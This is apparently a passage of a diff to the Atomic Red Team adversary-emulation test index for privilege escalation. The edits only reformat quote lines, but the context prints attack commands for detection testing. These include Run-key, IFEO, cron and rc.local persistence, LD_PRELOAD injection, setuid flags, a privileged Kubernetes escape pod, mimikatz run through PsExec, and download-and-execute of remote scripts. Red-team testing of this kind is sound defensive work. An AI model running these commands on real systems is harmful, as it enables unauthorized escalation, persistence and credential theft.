New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -13039,10 +13039,10 @@ privilege-escalation:
executor:
command: 'assoc #{extension_to_change}=#{target_extension_handler}
-'
+ '
cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler}
-'
+ '
name: command_prompt
elevation_required: true
T1078.004:
@@ -13111,7 +13111,7 @@ privilege-escalation:
description: 'GCP Service Accounts can be used to gain intial access as well
as maintain persistence inside Google Cloud.
-'
+ '
supported_platforms:
- google-workspace
- windows
@@ -13146,20 +13146,20 @@ privilege-escalation:
cleanup_command: 'gcloud iam service-accounts delete #{service-account-email}
--quiet
-'
+ '
dependency_executor_name: gcloud
dependencies:
- description: 'Requires gcloud
-'
+ '
prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'echo "Please Install Google Cloud SDK before running
this atomic test : https://cloud.google.com/sdk/docs/install"
-'
+ '
T1546.015:
technique:
object_marking_refs:
@@ -13290,7 +13290,7 @@ privilege-escalation:
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
cleanup_command: 'Get-Process -Name "*calc" | Stop-Process
-'
+ '
name: powershell
T1053.007:
technique:
@@ -13359,7 +13359,7 @@ privilege-escalation:
CronJob for scheduling execution of malicious code that would run as a container
in the cluster.
-'
+ '
supported_platforms:
- containers
input_arguments:
@@ -13370,17 +13370,17 @@ privilege-escalation:
dependencies:
- description: 'kubectl must be installed
-'
+ '
get_prereq_command: 'echo "kubectl must be installed manually"
-'
+ '
prereq_command: 'which kubectl
-'
+ '
executor:
command: 'kubectl get cronjobs -n #{namespace}
-'
+ '
name: bash
elevation_required: false
- name: CreateCronjob
@@ -13392,7 +13392,7 @@ privilege-escalation:
CronJob for scheduling execution of malicious code that would run as a container
in the cluster.
-'
+ '
supported_platforms:
- containers
input_arguments:
@@ -13403,20 +13403,20 @@ privilege-escalation:
dependencies:
- description: 'kubectl must be installed
-'
+ '
get_prereq_command: 'echo "kubectl must be installed manually"
-'
+ '
prereq_command: 'which kubectl
-'
+ '
executor:
command: 'kubectl create -f src/cronjob.yaml -n #{namespace}
-'
+ '
cleanup_command: 'kubectl delete cronjob art -n #{namespace}
-'
+ '
name: bash
elevation_required: false
T1134.002:
@@ -13627,7 +13627,7 @@ privilege-escalation:
of the referenced file. This technique was used by numerous IoT automated
exploitation attacks.
-'
+ '
supported_platforms:
- macos
- linux
@@ -13647,7 +13647,7 @@ privilege-escalation:
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
cleanup_command: 'crontab /tmp/notevil
-'
+ '
- name: Cron - Add script to all cron subfolders
auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily,
@@ -13655,7 +13655,7 @@ privilege-escalation:
schedule. This technique was used by the threat actor Rocke during the exploitation
of Linux web servers.
-'
+ '
supported_platforms:
- macos
- linux
@@ -13687,7 +13687,7 @@ privilege-escalation:
to execute on a schedule. This technique was used by the threat actor Rocke
during the exploitation of Linux web servers.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -13704,10 +13704,10 @@ privilege-escalation:
name: bash
command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
-'
+ '
cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name}
-'
+ '
T1574.001:
technique:
object_marking_refs:
@@ -13882,10 +13882,10 @@ privilege-escalation:
dependencies:
- description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable})
-'
+ '
prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}"
@@ -13893,7 +13893,7 @@ privilege-escalation:
command: "#{gup_executable}\n"
cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
-'
+ '
name: command_prompt
T1078.001:
technique:
@@ -14013,7 +14013,7 @@ privilege-escalation:
description: 'The Adversaries can activate the default Guest user. The guest
account is inactivated by default
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -14024,10 +14024,10 @@ privilege-escalation:
executor:
command: 'net user #{guest_user} /active:yes
-'
+ '
cleanup_command: 'net user #{guest_user} /active:no
-'
+ '
name: command_prompt
elevation_required: true
T1078.002:
@@ -14300,13 +14300,13 @@ privilege-escalation:
Provider to be federated must be configured (outside of the scope of this
test).
-'
+ '
prereq_command: 'if (Get-Module AzureADPreview) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AzureADPreview -Force
-'
+ '
executor:
command: |
Import-Module AzureADPreview
@@ -14568,21 +14568,21 @@ privilege-escalation:
- description: 'The shared library must exist on disk at specified location
(#{path_to_shared_library})
-'
+ '
prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
-'
+ '
executor:
command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload''
-'
+ '
cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload
-'
+ '
name: bash
elevation_required: true
- name: Shared Library Injection via LD_PRELOAD
@@ -14607,18 +14607,18 @@ privilege-escalation:
- description: 'The shared library must exist on disk at specified location
(#{path_to_shared_library})
-'
+ '
prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
-'
+ '
executor:
command: 'LD_PRELOAD=#{path_to_shared_library} ls
-'
+ '
name: bash
T1055.001:
technique:
@@ -14719,10 +14719,10 @@ privilege-escalation:
dependencies:
- description: 'Utility to inject must exist on disk at specified location (#{dll_payload})
-'
+ '
prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}"
@@ -14868,7 +14868,7 @@ privilege-escalation:
description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor)
daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -14974,24 +14974,24 @@ privilege-escalation:
- description: Verify docker is installed.
prereq_command: 'which docker
-'
+ '
get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
echo "Docker installed"; fi
-'
+ '
- description: Verify docker service is running.
prereq_command: 'sudo systemctl status docker
-'
+ '
get_prereq_command: 'sudo systemctl start docker
-'
+ '
- description: Verify kind is in the path.
prereq_command: 'which kind
-'
+ '
get_prereq_command: |
curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64
chmod +x ./kind
@@ -14999,14 +14999,14 @@ privilege-escalation:
- description: Verify kind-atomic-cluster is created
prereq_command: 'sudo kind get clusters
-'
+ '
get_prereq_command: 'sudo kind create cluster --name atomic-cluster
-'
+ '
- description: Verify kubectl is in path
prereq_command: 'which kubectl
-'
+ '
get_prereq_command: |
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
chmod +x ./kubectl
@@ -15017,11 +15017,11 @@ privilege-escalation:
true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin":
true,"tty":true,"securityContext":{"privileged":true}}]}}''
-'
+ '
name: sh
cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-escape-pod
-'
+ '
T1546:
technique:
object_marking_refs:
@@ -15565,7 +15565,7 @@ privilege-escalation:
auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8
description: 'Leverage Global Flags Settings
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -15581,19 +15581,19 @@ privilege-escalation:
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
-'
+ '
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger
/f >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: IFEO Global Flags
auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1
description: 'Leverage Global Flags Settings
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -15742,7 +15742,7 @@ privilege-escalation:
description: 'This test uses the insmod command to load a kernel module for
Linux.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -15766,10 +15766,10 @@ privilege-escalation:
dependencies:
- description: 'The kernel module must exist on disk at specified location
-'
+ '
prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: |
if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;
cp #{module_source_path}/* #{temp_folder}/
@@ -15778,7 +15778,7 @@ privilege-escalation:
executor:
command: 'sudo insmod #{module_path}
-'
+ '
cleanup_command: |
sudo rmmod #{module_name}
[ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder}
@@ -15990,7 +15990,7 @@ privilege-escalation:
auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900
description: 'Create a plist and execute it
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -16007,15 +16007,15 @@ privilege-escalation:
- description: 'The shared library must exist on disk at specified location
(#{path_malicious_plist})
-'
+ '
prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'echo "The shared library doesn''t exist. Check the path";
exit 1;
-'
+ '
executor:
name: bash
elevation_required: true
@@ -16113,7 +16113,7 @@ privilege-escalation:
auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf
description: 'Utilize LaunchDaemon to launch `Hello World`
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -16130,15 +16130,15 @@ privilege-escalation:
- description: 'The shared library must exist on disk at specified location
(#{path_malicious_plist})
-'
+ '
prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and
try again."; exit 1;
-'
+ '
executor:
name: bash
elevation_required: true
@@ -16494,7 +16494,7 @@ privilege-escalation:
auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4
description: 'Mac logon script
-'
+ '
supported_platforms:
- macos
executor:
@@ -16692,7 +16692,7 @@ privilege-escalation:
description: 'Netsh interacts with other operating system components using dynamic-link
library (DLL) files
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -16703,7 +16703,7 @@ privilege-escalation:
executor:
command: 'netsh.exe add helper #{helper_file}
-'
+ '
name: command_prompt
T1037.003:
technique:
@@ -16865,10 +16865,10 @@ privilege-escalation:
dependencies:
- description: 'DLL to inject must exist on disk at specified location (#{dll_path})
-'
+ '
prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}"
@@ -16909,7 +16909,7 @@ privilege-escalation:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine
''#{command_line}'' -ParentId #{parent_pid}'
@@ -16938,7 +16938,7 @@ privilege-escalation:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid
#{test_guid}'
@@ -16968,7 +16968,7 @@ privilege-escalation:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine,
ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" |
@@ -17004,7 +17004,7 @@ privilege-escalation:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent
-FilePath #{file_path} -CommandLine ''#{command_line}'''
@@ -17396,7 +17396,7 @@ privilege-escalation:
auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8
description: 'Modify MacOS plist file in one of two directories
-'
+ '
supported_platforms:
- macos
executor:
@@ -17497,11 +17497,11 @@ privilege-escalation:
command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART"
/v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ
-'
+ '
cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART"
/f >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
T1055.002:
@@ -17650,7 +17650,7 @@ privilege-escalation:
profile pofile that points to a malicious executable. Upon execution, calc.exe
will be launched.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -17666,13 +17666,13 @@ privilege-escalation:
dependencies:
- description: 'Ensure a powershell profile exists for the current user
-'
+ '
prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force
-'
+ '
executor:
command: |
Add-Content #{ps_profile} -Value ""
@@ -18020,13 +18020,13 @@ privilege-escalation:
cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction
Ignore
-'
+ '
name: powershell
- name: RunPE via VBA
auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
description: 'This module executes notepad.exe from within the WINWORD.EXE process
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -18038,7 +18038,7 @@ privilege-escalation:
dependencies:
- description: 'Microsoft #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -18049,7 +18049,7 @@ privilege-escalation:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -18173,7 +18173,7 @@ privilege-escalation:
dependencies:
- description: 'The 64-bit version of Microsoft Office must be installed
-'
+ '
prereq_command: |
try {
$wdApp = New-Object -COMObject "Word.Application"
@@ -18184,7 +18184,7 @@ privilege-escalation:
get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit)
manually to meet this requirement"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -18219,7 +18219,7 @@ privilege-escalation:
- description: 'Mimikatz executor must exist on disk and at specified location
(#{mimikatz_path})
-'
+ '
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -18234,10 +18234,10 @@ privilege-escalation:
- description: 'PsExec tool from Sysinternals must exist on disk at specified
location (#{psexec_path})
-'
+ '
prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
@@ -18248,7 +18248,7 @@ privilege-escalation:
command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa
/inject /id:500" "exit"
-'
+ '
name: command_prompt
elevation_required: false
T1055.008:
@@ -18425,14 +18425,14 @@ privilege-escalation:
command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello
World"'' >> /etc/rc.common
-'
+ '
elevation_required: true
name: bash
- name: rc.common
auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
description: 'Modify rc.common
-'
+ '
supported_platforms:
- linux
executor:
@@ -18448,12 +18448,12 @@ privilege-escalation:
];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common
&& sudo rm $origfilename;fi
-'
+ '
- name: rc.local
auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
description: 'Modify rc.local
-'
+ '
supported_platforms:
- linux
executor:
@@ -18469,7 +18469,7 @@ privilege-escalation:
];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
sudo rm $origfilename;fi
-'
+ '
T1547.007:
technique:
type: attack-pattern
@@ -18551,10 +18551,10 @@ privilege-escalation:
executor:
command: 'sudo defaults write com.apple.loginwindow LoginHook #{script}
-'
+ '
cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook
-'
+ '
elevation_required: true
name: sh
T1547.001:
@@ -18680,11 +18680,11 @@ privilege-escalation:
command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V
"Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
-'
+ '
cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
/V "Atomic Red Team" /f >nul 2>&1
-'
+ '
name: command_prompt
- name: Reg Key RunOnce
auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb
@@ -18702,11 +18702,11 @@ privilege-escalation:
command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
/v 1 /d "#{thing_to_execute}"
-'
+ '
cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
/v 1 /f >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: PowerShell Registry RunOnce
@@ -18732,7 +18732,7 @@ privilege-escalation:
cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
-Force -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: true
- name: Suspicious vbs file run from startup Folder
@@ -18846,7 +18846,7 @@ privilege-escalation:
cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell"
-Force -ErrorAction Ignore
-'
+ '
name: powershell
T1134.005:
technique:
@@ -19011,7 +19011,7 @@ privilege-escalation:
description: 'Upon successful execution, cmd.exe will create a scheduled task
to spawn cmd.exe at 20:10.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -19028,10 +19028,10 @@ privilege-escalation:
elevation_required: false
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
-'
+ '
cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1
-'
+ '
- name: Scheduled task Remote
auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
description: |
@@ -19067,11 +19067,11 @@ privilege-escalation:
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
-'
+ '
cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password}
/TN "Atomic task" /F >nul 2>&1
-'
+ '
- name: Powershell Cmdlet Scheduled Task
auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
description: |
@@ -19093,7 +19093,7 @@ privilege-escalation:
cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
>$null 2>&1
-'
+ '
- name: Task Scheduler via VBA
auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
description: |
@@ -19110,7 +19110,7 @@ privilege-escalation:
dependencies:
- description: 'Microsoft #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -19121,7 +19121,7 @@ privilege-escalation:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -19134,7 +19134,7 @@ privilege-escalation:
login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing
as Register-ScheduledTask cmdlet behind the scenes.
-'
+ '
supported_platforms:
- windows
executor:
@@ -19146,7 +19146,7 @@ privilege-escalation:
cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false
>$null 2>&1
-'
+ '
- name: Scheduled Task Executing Base64 Encoded Commands From Registry
auto_generated_guid: e895677d-4f06-49ab-91b6-ae3742d0a2ba
description: "A Base64 Encoded command will be stored in the registry (ping
@@ -19304,7 +19304,7 @@ privilege-escalation:
sets it as the screensaver so it will execute for persistence. Requires a
reboot and logon.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -19566,7 +19566,7 @@ privilege-escalation:
description: 'Change Service registry ImagePath of a bengin service to a malicious
file
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -19586,22 +19586,22 @@ privilege-escalation:
dependencies:
- description: 'The service must exist (#{weak_service_name})
-'
+ '
prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
-'
+ '
executor:
command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}"
/f /v ImagePath /d "#{malicious_service_path}"
-'
+ '
cleanup_command: 'sc.exe delete #{weak_service_name}
-'
+ '
name: command_prompt
T1548.001:
technique:
@@ -19657,7 +19657,7 @@ privilege-escalation:
description: 'Make, change owner, and change file attributes on a C source code
file
-'
+ '
supported_platforms:
- macos
- linux
@@ -19683,7 +19683,7 @@ privilege-escalation:
auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79
description: 'This test sets the SetUID flag on a file in Linux and macOS.
-'
+ '
supported_platforms:
- macos
- linux
@@ -19699,14 +19699,14 @@ privilege-escalation:
sudo chmod u+s #{file_to_setuid}
cleanup_command: 'sudo rm #{file_to_setuid}
-'
+ '
name: sh
elevation_required: true
- name: Set a SetGID flag on file
auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c
description: 'This test sets the SetGID flag on a file in Linux and macOS.
-'
+ '
supported_platforms:
- macos
- linux
@@ -19722,7 +19722,7 @@ privilege-escalation:
sudo chmod g+s #{file_to_setuid}
cleanup_command: 'sudo rm #{file_to_setuid}
-'
+ '
name: sh
elevation_required: true
- name: Make and modify capabilities of a binary
@@ -19754,7 +19754,7 @@ privilege-escalation:
description: 'This test gives a file the capability to set UID without using
flags.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -19768,7 +19768,7 @@ privilege-escalation:
sudo setcap cap_setuid=ep #{file_to_setcap}
cleanup_command: 'rm #{file_to_setcap}
-'
+ '
name: sh
elevation_required: true
T1547.009:
@@ -19842,7 +19842,7 @@ privilege-escalation:
#{shortcut_file_path}
cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1
-'
+ '
name: command_prompt
- name: Create shortcut to cmd in startup folders
auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2
@@ -19943,10 +19943,10 @@ privilege-escalation:
executor:
command: 'sudo touch /Library/StartupItems/EvilStartup.plist
-'
+ '
cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist
-'
+ '
name: sh
elevation_required: true
T1548.003:
@@ -20014,7 +20014,7 @@ privilege-escalation:
auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e
description: 'Common Sudo enumeration methods.
-'
+ '
supported_platforms:
- macos
- linux
@@ -20028,7 +20028,7 @@ privilege-escalation:
This is dangerous to modify without using ''visudo'', do not do this on a
production system.
-'
+ '
supported_platforms:
- macos
- linux
@@ -20043,7 +20043,7 @@ privilege-escalation:
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
to modify without using ''visudo'', do not do this on a production system.
-'
+ '
supported_platforms:
- macos
- linux
@@ -20149,7 +20149,7 @@ privilege-escalation:
description: 'This test creates a Systemd service unit file and enables it as
a service.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -20222,15 +20222,15 @@ privilege-escalation:
dependencies:
- description: 'System must be Ubuntu ,Kali OR CentOS.
-'
+ '
prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat
/etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i
''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi;
-'
+ '
get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS.
-'
+ '
executor:
name: bash
elevation_required: true
@@ -20387,20 +20387,20 @@ privilege-escalation:
dependencies:
- description: 'Check if systemd-run exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else
exit 1; fi;
-'
+ '
get_prereq_command: 'echo "Install systemd on the machine."; exit 1;
-'
+ '
executor:
elevation_required: false
command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1''
/bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log''
-'
+ '
cleanup_command: |
systemctl --user stop Atomic-Red-Team.service
systemctl --user stop Atomic-Red-Team.timer
@@ -20417,20 +20417,20 @@ privilege-escalation:
dependencies:
- description: 'Check if systemd-run exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else
exit 1; fi;
-'
+ '
get_prereq_command: 'echo "Install systemd on the machine."; exit 1;
-'
+ '
executor:
elevation_required: true
command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh
-c ''echo "$(date) $(whoami)" >>/tmp/log''
-'
+ '
cleanup_command: |
systemctl stop Atomic-Red-Team.service
systemctl stop Atomic-Red-Team.timer
@@ -20909,7 +20909,7 @@ privilege-escalation:
auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f
description: 'Adds a command to the .bash_profile file of the current user
-'
+ '
supported_platforms:
- macos
- linux
@@ -20921,16 +20921,16 @@ privilege-escalation:
executor:
command: 'echo ''#{command_to_add}'' >> ~/.bash_profile
-'
+ '
cleanup_command: 'sed -i ''/#{command_to_add}/d'' ~/.bash_profile
-'
+ '
name: sh
- name: Add command to .bashrc
auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f
description: 'Adds a command to the .bashrc file of the current user
-'
+ '
supported_platforms:
- macos
- linux
@@ -20942,10 +20942,10 @@ privilege-escalation:
executor:
command: 'echo ''#{command_to_add}'' >> ~/.bashrc
-'
+ '
cleanup_command: 'sed -i ''/#{command_to_add}/d'' ~/.bashrc
-'
+ '
name: sh
T1055.014:
technique:
@@ -21382,10 +21382,10 @@ privilege-escalation:
dependencies:
- description: 'Service binary must exist on disk at specified location (#{binary_path})
-'
+ '
prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
@@ -21418,10 +21418,10 @@ privilege-escalation:
dependencies:
- description: 'Service binary must exist on disk at specified location (#{binary_path})
-'
+ '
prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
@@ -21547,11 +21547,11 @@ privilege-escalation:
command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
"Shell" "explorer.exe, #{binary_to_execute}" -Force
-'
+ '
cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: Winlogon Userinit Key Persistence - PowerShell
auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb
@@ -21570,11 +21570,11 @@ privilege-escalation:
command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
"Userinit" "Userinit.exe, #{binary_to_execute}" -Force
-'
+ '
cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
-'
+ '
name: powershell
